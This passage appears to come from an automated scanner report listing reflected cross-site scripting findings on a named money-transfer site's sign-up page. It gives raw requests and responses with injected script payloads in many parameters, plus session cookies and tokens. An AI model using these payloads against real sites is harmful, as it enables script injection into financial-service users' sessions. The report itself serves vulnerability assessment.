HTTP/1.1 200 OKDCF7D5E325B59656B39EE7C; Path=/sendmoneynow.XoomAuthenticationProcessingFilter.USERNAME=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/sendmoneynow"; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/.SignedInRequestTimestampMarkerCookieGenerator.TIMESTAMP=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/bf5ef87b5569bb"/xhtml11/DTD/xhtml11.dtd">/1999/xhtml" xml:lang="en" lang="en">...[SNIP]... =true&lastName=435f9"><script>alert(1)</script>e78f8fffe8ec9c07a &_action=signUp&newPassword=&passwordVerification=&contactInformation.email.value=&countryCode=US&first_name=&emailVerification=&token=2f5c1a54e134df4686142187005bbf2337...[SNIP]...
1.12. https://www.xoom.com/sendmoneynow/signUp [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3aed6"><script>alert(1)</script>6def3fd099f999a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
Request
GET /sendmoneynow/signUp?first_name=&countryCode=US&lastName=&contactInformation.firstName.value=&contactInformation.lastName.value=&contactInformation.email.value=&name=&emailVerification=&newPassword=&passwordVerification=&contactInformation.phone1.value=&phone1Included=true&signInTs=1320876654393&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&_action=signUp&3aed6"><script>alert(1)</script>6def3fd099f999a1 =1 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/sendmoneynow/signUp?intcid=home2_____signupE0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876712|session#1320876608475-967538#1320878512; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_v1%3Dhome2_____signup%3B%20s_gvo_visit%3DNew%3B%20s_sq%3D%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878451349%3B%20s_nr%3D1320876651352-New%7C1323468651352%3B%20s_gpv_pn%3Dhome.signup%2520-xoom%7C1320878451355%3B%20s_nr2%3D1320876651360-New%7C1478556651360%3B%20s_vs%3D1%7C1320878451380%3B
Response
HTTP/1.1 200 OK264E3F8BB60C8A0178EB87E; Path=/sendmoneynow.XoomAuthenticationProcessingFilter.USERNAME=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/sendmoneynow"; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/.SignedInRequestTimestampMarkerCookieGenerator.TIMESTAMP=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/bdc00766536ab9"/xhtml11/DTD/xhtml11.dtd">/1999/xhtml" xml:lang="en" lang="en">...[SNIP]... .value=&countryCode=US&first_name=&emailVerification=&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&name=&contactInformation.firstName.value=&3aed6"><script>alert(1)</script>6def3fd099f999a1 =1&contactInformation.phone1.value=&signInTs=1320876654393&contactInformation.lastName.value=&languageCode=de" rel="de" title="Deutsch">...[SNIP]...
1.13. https://www.xoom.com/sendmoneynow/signUp [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5e87"><script>alert(1)</script>e88ad41e56d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
Request
GET /sendmoneynow/signUp?intcid=home2_____signup&d5e87"><script>alert(1)</script>e88ad41e56d =1 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/sendmoneynow/homeE0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876689|session#1320876608475-967538#1320878489; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_visit%3DNew%3B%20s_sq%3Dxoom-prod%253D%252526pid%25253Dhome.home%25252520-xoom%252526pidt%25253D1%252526oid%25253Dhttps%2525253A%2525252F%2525252Fwww.xoom.com%2525252Fsendmoneynow%2525252FsignUp%2525253Fintcid%2525253Dhome2_____signup%252526ot%25253DA%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878449571%3B%20s_nr%3D1320876649573-New%7C1323468649573%3B%20s_gpv_pn%3Dhome.home%2520-xoom%7C1320878449575%3B%20s_nr2%3D1320876649578-New%7C1478556649578%3B%20s_vs%3D1%7C1320878449585%3B
Response
HTTP/1.1 200 OKA7941997542C9F8D3CBD194; Path=/sendmoneynow.XoomAuthenticationProcessingFilter.USERNAME=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/sendmoneynow"; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/.SignedInRequestTimestampMarkerCookieGenerator.TIMESTAMP=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/e1992ff7e8d791"/xhtml11/DTD/xhtml11.dtd">/1999/xhtml" xml:lang="en" lang="en">...[SNIP]... _signup&d5e87"><script>alert(1)</script>e88ad41e56d =1&languageCode=de" rel="de" title="Deutsch">...[SNIP]...
1.14. https://www.xoom.com/sendmoneynow/signUp [name parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The value of the name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b681"><script>alert(1)</script>3233fed4aa53eacbe was submitted in the name parameter. This input was echoed unmodified in the application's response.
Request
GET /sendmoneynow/signUp?first_name=&countryCode=US&lastName=&contactInformation.firstName.value=&contactInformation.lastName.value=&contactInformation.email.value=&name=9b681"><script>alert(1)</script>3233fed4aa53eacbe &emailVerification=&newPassword=&passwordVerification=&contactInformation.phone1.value=&phone1Included=true&signInTs=1320876654393&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&_action=signUp HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/sendmoneynow/signUp?intcid=home2_____signupE0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876712|session#1320876608475-967538#1320878512; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_v1%3Dhome2_____signup%3B%20s_gvo_visit%3DNew%3B%20s_sq%3D%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878451349%3B%20s_nr%3D1320876651352-New%7C1323468651352%3B%20s_gpv_pn%3Dhome.signup%2520-xoom%7C1320878451355%3B%20s_nr2%3D1320876651360-New%7C1478556651360%3B%20s_vs%3D1%7C1320878451380%3B
Response
HTTP/1.1 200 OKE76AD84B1E31B777A7C7613; Path=/sendmoneynow.XoomAuthenticationProcessingFilter.USERNAME=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/sendmoneynow"; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/.SignedInRequestTimestampMarkerCookieGenerator.TIMESTAMP=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/98d230e96da50e"/xhtml11/DTD/xhtml11.dtd">/1999/xhtml" xml:lang="en" lang="en">...[SNIP]... .email.value=&countryCode=US&first_name=&emailVerification=&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&contactInformation.firstName.value=&name=9b681"><script>alert(1)</script>3233fed4aa53eacbe &contactInformation.phone1.value=&contactInformation.lastName.value=&signInTs=1320876654393&languageCode=de" rel="de" title="Deutsch">...[SNIP]...
1.15. https://www.xoom.com/sendmoneynow/signUp [newPassword parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The value of the newPassword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4025c"><script>alert(1)</script>547233f6bfd9112a5 was submitted in the newPassword parameter. This input was echoed unmodified in the application's response.
Request
GET /sendmoneynow/signUp?first_name=&countryCode=US&lastName=&contactInformation.firstName.value=&contactInformation.lastName.value=&contactInformation.email.value=&name=&emailVerification=&newPassword=4025c"><script>alert(1)</script>547233f6bfd9112a5 &passwordVerification=&contactInformation.phone1.value=&phone1Included=true&signInTs=1320876654393&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&_action=signUp HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/sendmoneynow/signUp?intcid=home2_____signupE0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876712|session#1320876608475-967538#1320878512; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_v1%3Dhome2_____signup%3B%20s_gvo_visit%3DNew%3B%20s_sq%3D%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878451349%3B%20s_nr%3D1320876651352-New%7C1323468651352%3B%20s_gpv_pn%3Dhome.signup%2520-xoom%7C1320878451355%3B%20s_nr2%3D1320876651360-New%7C1478556651360%3B%20s_vs%3D1%7C1320878451380%3B
Response
HTTP/1.1 200 OK3B9D265CE5CCBF167D890BC; Path=/sendmoneynow.XoomAuthenticationProcessingFilter.USERNAME=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/sendmoneynow"; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/.SignedInRequestTimestampMarkerCookieGenerator.TIMESTAMP=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/8c1e290223ba0c"/xhtml11/DTD/xhtml11.dtd">/1999/xhtml" xml:lang="en" lang="en">...[SNIP]... _action=signUp&phone1Included=true&newPassword=4025c"><script>alert(1)</script>547233f6bfd9112a5 &passwordVerification=&contactInformation.email.value=&countryCode=US&first_name=&emailVerification=&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&contactInformatio...[SNIP]...
1.16. https://www.xoom.com/sendmoneynow/signUp [passwordVerification parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The value of the passwordVerification request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 717f9"><script>alert(1)</script>e5c4c33639176b531 was submitted in the passwordVerification parameter. This input was echoed unmodified in the application's response.
Request
GET /sendmoneynow/signUp?first_name=&countryCode=US&lastName=&contactInformation.firstName.value=&contactInformation.lastName.value=&contactInformation.email.value=&name=&emailVerification=&newPassword=&passwordVerification=717f9"><script>alert(1)</script>e5c4c33639176b531 &contactInformation.phone1.value=&phone1Included=true&signInTs=1320876654393&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&_action=signUp HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/sendmoneynow/signUp?intcid=home2_____signupE0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876712|session#1320876608475-967538#1320878512; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_v1%3Dhome2_____signup%3B%20s_gvo_visit%3DNew%3B%20s_sq%3D%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878451349%3B%20s_nr%3D1320876651352-New%7C1323468651352%3B%20s_gpv_pn%3Dhome.signup%2520-xoom%7C1320878451355%3B%20s_nr2%3D1320876651360-New%7C1478556651360%3B%20s_vs%3D1%7C1320878451380%3B
Response
HTTP/1.1 200 OK204EEF7EF417FF7DE220148; Path=/sendmoneynow.XoomAuthenticationProcessingFilter.USERNAME=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/sendmoneynow"; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/.SignedInRequestTimestampMarkerCookieGenerator.TIMESTAMP=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/5f0608570143c8"/xhtml11/DTD/xhtml11.dtd">/1999/xhtml" xml:lang="en" lang="en">...[SNIP]... =true&lastName=&_action=signUp&newPassword=&passwordVerification=717f9"><script>alert(1)</script>e5c4c33639176b531 &contactInformation.email.value=&countryCode=US&first_name=&emailVerification=&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&name=&contactInformation.firstName.valu...[SNIP]...
1.17. https://www.xoom.com/sendmoneynow/signUp [phone1Included parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The value of the phone1Included request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3aa9d"><script>alert(1)</script>7730d018d28cd4fa6 was submitted in the phone1Included parameter. This input was echoed unmodified in the application's response.
Request
GET /sendmoneynow/signUp?first_name=&countryCode=US&lastName=&contactInformation.firstName.value=&contactInformation.lastName.value=&contactInformation.email.value=&name=&emailVerification=&newPassword=&passwordVerification=&contactInformation.phone1.value=&phone1Included=true3aa9d"><script>alert(1)</script>7730d018d28cd4fa6 &signInTs=1320876654393&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&_action=signUp HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/sendmoneynow/signUp?intcid=home2_____signupE0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876712|session#1320876608475-967538#1320878512; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_v1%3Dhome2_____signup%3B%20s_gvo_visit%3DNew%3B%20s_sq%3D%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878451349%3B%20s_nr%3D1320876651352-New%7C1323468651352%3B%20s_gpv_pn%3Dhome.signup%2520-xoom%7C1320878451355%3B%20s_nr2%3D1320876651360-New%7C1478556651360%3B%20s_vs%3D1%7C1320878451380%3B
Response
HTTP/1.1 200 OKFE155012388B29AED757AEA; Path=/sendmoneynow.XoomAuthenticationProcessingFilter.USERNAME=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/sendmoneynow"; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/.SignedInRequestTimestampMarkerCookieGenerator.TIMESTAMP=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/2823e09ba23a84"/xhtml11/DTD/xhtml11.dtd">/1999/xhtml" xml:lang="en" lang="en">...[SNIP]... =true3aa9d"><script>alert(1)</script>7730d018d28cd4fa6 &lastName=&_action=signUp&newPassword=&passwordVerification=&contactInformation.email.value=&countryCode=US&first_name=&emailVerification=&token=2f5c1a54e134df468614...[SNIP]...
1.18. https://www.xoom.com/sendmoneynow/signUp [phone1Included parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The value of the phone1Included request parameter is copied into the HTML document as plain text between tags. The payload c0de8<script>alert(1)</script>920b8ce3a03 was submitted in the phone1Included parameter. This input was echoed unmodified in the application's response.
Request
POST /sendmoneynow/signUp HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/sendmoneynow/signUp?intcid=home2_____signupE0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876712|session#1320876608475-967538#1320878512; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_v1%3Dhome2_____signup%3B%20s_gvo_visit%3DNew%3B%20s_sq%3D%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878451349%3B%20s_nr%3D1320876651352-New%7C1323468651352%3B%20s_gpv_pn%3Dhome.signup%2520-xoom%7C1320878451355%3B%20s_nr2%3D1320876651360-New%7C1478556651360%3B%20s_vs%3D1%7C1320878451380%3B-urlencoded=US&lastName=&contactInformation.firstName.value=&contactInformation.lastName.value=&contactInformation.email.value=&name=&emailVerification=&newPassword=&passwordVerification=&contactInformation.phone1.value=&phone1Included=truec0de8<script>alert(1)</script>920b8ce3a03 &signInTs=1320876654393&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&_action=signUp
Response
HTTP/1.1 200 OKC7BFADC8EF58D4328C91984; Path=/sendmoneynow.XoomAuthenticationProcessingFilter.USERNAME=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/sendmoneynow"; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/.SignedInRequestTimestampMarkerCookieGenerator.TIMESTAMP=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ec8320fd417fac"/xhtml11/DTD/xhtml11.dtd">/1999/xhtml" xml:lang="en" lang="en">...[SNIP]... umentException: Invalid boolean value [truec0de8<script>alert(1)</script>920b8ce3a03 ]</strong>...[SNIP]...
1.19. https://www.xoom.com/sendmoneynow/signUp [signInTs parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The value of the signInTs request parameter is copied into the HTML document as plain text between tags. The payload beb75<script>alert(1)</script>fa8efd725a was submitted in the signInTs parameter. This input was echoed unmodified in the application's response.
Request
POST /sendmoneynow/signUp HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/sendmoneynow/signUp?intcid=home2_____signupE0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876712|session#1320876608475-967538#1320878512; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_v1%3Dhome2_____signup%3B%20s_gvo_visit%3DNew%3B%20s_sq%3D%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878451349%3B%20s_nr%3D1320876651352-New%7C1323468651352%3B%20s_gpv_pn%3Dhome.signup%2520-xoom%7C1320878451355%3B%20s_nr2%3D1320876651360-New%7C1478556651360%3B%20s_vs%3D1%7C1320878451380%3B-urlencoded=US&lastName=&contactInformation.firstName.value=&contactInformation.lastName.value=&contactInformation.email.value=&name=&emailVerification=&newPassword=&passwordVerification=&contactInformation.phone1.value=&phone1Included=true&signInTs=1320876654393beb75<script>alert(1)</script>fa8efd725a &token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&_action=signUp
Response
HTTP/1.1 200 OKECD7EC5C4922B6224DBC77F; Path=/sendmoneynow.XoomAuthenticationProcessingFilter.USERNAME=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/sendmoneynow"; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/.SignedInRequestTimestampMarkerCookieGenerator.TIMESTAMP=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/822cf2081dcb41"/xhtml11/DTD/xhtml11.dtd">/1999/xhtml" xml:lang="en" lang="en">...[SNIP]... atException: For input string: "1320876654393beb75<script>alert(1)</script>fa8efd725a "</strong>...[SNIP]...
1.20. https://www.xoom.com/sendmoneynow/signUp [signInTs parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The value of the signInTs request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5748"><script>alert(1)</script>8c0f4bfaa9682ceb7 was submitted in the signInTs parameter. This input was echoed unmodified in the application's response.
Request
GET /sendmoneynow/signUp?first_name=&countryCode=US&lastName=&contactInformation.firstName.value=&contactInformation.lastName.value=&contactInformation.email.value=&name=&emailVerification=&newPassword=&passwordVerification=&contactInformation.phone1.value=&phone1Included=true&signInTs=1320876654393f5748"><script>alert(1)</script>8c0f4bfaa9682ceb7 &token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&_action=signUp HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/sendmoneynow/signUp?intcid=home2_____signupE0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876712|session#1320876608475-967538#1320878512; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_v1%3Dhome2_____signup%3B%20s_gvo_visit%3DNew%3B%20s_sq%3D%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878451349%3B%20s_nr%3D1320876651352-New%7C1323468651352%3B%20s_gpv_pn%3Dhome.signup%2520-xoom%7C1320878451355%3B%20s_nr2%3D1320876651360-New%7C1478556651360%3B%20s_vs%3D1%7C1320878451380%3B
Response
HTTP/1.1 200 OK8007412EFC1F0D627F7DD52; Path=/sendmoneynow.XoomAuthenticationProcessingFilter.USERNAME=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/sendmoneynow"; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/.SignedInRequestTimestampMarkerCookieGenerator.TIMESTAMP=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/46537722faf939"/xhtml11/DTD/xhtml11.dtd">/1999/xhtml" xml:lang="en" lang="en">...[SNIP]... ication=&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&contactInformation.firstName.value=&name=&contactInformation.phone1.value=&signInTs=1320876654393f5748"><script>alert(1)</script>8c0f4bfaa9682ceb7 &contactInformation.lastName.value=&languageCode=de" rel="de" title="Deutsch">...[SNIP]...
1.21. https://www.xoom.com/sendmoneynow/signUp [token parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The value of the token request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cac34'%3balert(1)//be47d01954c was submitted in the token parameter. This input was echoed as cac34';alert(1)//be47d01954c in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
POST /sendmoneynow/signUp HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/sendmoneynow/signUp?intcid=home2_____signupE0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876712|session#1320876608475-967538#1320878512; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_v1%3Dhome2_____signup%3B%20s_gvo_visit%3DNew%3B%20s_sq%3D%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878451349%3B%20s_nr%3D1320876651352-New%7C1323468651352%3B%20s_gpv_pn%3Dhome.signup%2520-xoom%7C1320878451355%3B%20s_nr2%3D1320876651360-New%7C1478556651360%3B%20s_vs%3D1%7C1320878451380%3B-urlencoded=US&lastName=&contactInformation.firstName.value=&contactInformation.lastName.value=&contactInformation.email.value=&name=&emailVerification=&newPassword=&passwordVerification=&contactInformation.phone1.value=&phone1Included=true&signInTs=1320876654393&token=2f5c1a54e134df4686142187005bbf233797a34f661246cbcac34'%3balert(1)//be47d01954c &_action=signUp
Response
HTTP/1.1 200 OK334C9F3FA77BFB18F5BB61A; Path=/sendmoneynow.XoomAuthenticationProcessingFilter.USERNAME=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/sendmoneynow"; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/.SignedInRequestTimestampMarkerCookieGenerator.TIMESTAMP=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/dcac2eaf5d9b77"/xhtml11/DTD/xhtml11.dtd">/1999/xhtml" xml:lang="en" lang="en">...[SNIP]... (new Date().getTime());'signUpForm', 'signUp',{'token': '2f5c1a54e134df4686142187005bbf233797a34f661246cbcac34';alert(1)//be47d01954c '} );...[SNIP]...
1.22. https://www.xoom.com/sendmoneynow/signUp [token parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The value of the token request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33a53"><script>alert(1)</script>f12273ea59423a079 was submitted in the token parameter. This input was echoed unmodified in the application's response.
Request
GET /sendmoneynow/signUp?first_name=&countryCode=US&lastName=&contactInformation.firstName.value=&contactInformation.lastName.value=&contactInformation.email.value=&name=&emailVerification=&newPassword=&passwordVerification=&contactInformation.phone1.value=&phone1Included=true&signInTs=1320876654393&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb33a53"><script>alert(1)</script>f12273ea59423a079 &_action=signUp HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/sendmoneynow/signUp?intcid=home2_____signupE0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876712|session#1320876608475-967538#1320878512; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_v1%3Dhome2_____signup%3B%20s_gvo_visit%3DNew%3B%20s_sq%3D%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878451349%3B%20s_nr%3D1320876651352-New%7C1323468651352%3B%20s_gpv_pn%3Dhome.signup%2520-xoom%7C1320878451355%3B%20s_nr2%3D1320876651360-New%7C1478556651360%3B%20s_vs%3D1%7C1320878451380%3B
Response
